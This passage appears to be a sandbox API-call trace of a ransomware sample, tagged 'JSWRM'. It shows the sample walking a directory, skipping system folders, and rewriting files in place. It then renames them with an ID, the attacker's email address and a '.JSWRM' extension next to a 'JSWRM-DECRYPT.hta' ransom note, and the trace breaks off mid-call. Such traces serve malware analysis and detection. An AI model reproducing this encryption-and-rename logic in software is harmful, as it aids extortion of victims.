0x20e418 [0059.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0059.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0059.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.604] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1041\\jswrm-decrypt.hta")) returned 0x20 [0059.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0059.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0059.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0059.604] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a2fbc07, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0059.604] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.604] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a2fbc07, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.604] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.604] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.604] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.604] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0059.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0059.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0059.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0059.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0059.605] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.605] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=10125) returned 1 [0059.605] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2780) returned 0x23dc88 [0059.605] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x2780, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x2780, lpOverlapped=0x0) returned 1 [0059.607] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.607] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x2780, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x2780, lpOverlapped=0x0) returned 1 [0059.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.608] CloseHandle (hObject=0x3d4) returned 1 [0059.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0059.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0059.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0059.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0059.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0059.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.609] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0059.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0059.610] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a1f09ac, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a1f09ac, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a2fbc07, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.610] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0059.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0059.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.611] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.611] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0059.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0059.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0059.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0059.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0059.611] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.612] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=68226) returned 1 [0059.612] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10a80) returned 0x2471a8 [0059.612] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x10a80, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x10a80, lpOverlapped=0x0) returned 1 [0059.618] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.618] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x10a80, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x10a80, lpOverlapped=0x0) returned 1 [0059.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.619] CloseHandle (hObject=0x3d4) returned 1 [0059.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0059.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0059.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0059.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0059.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0059.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.621] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0059.622] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.622] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.622] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: 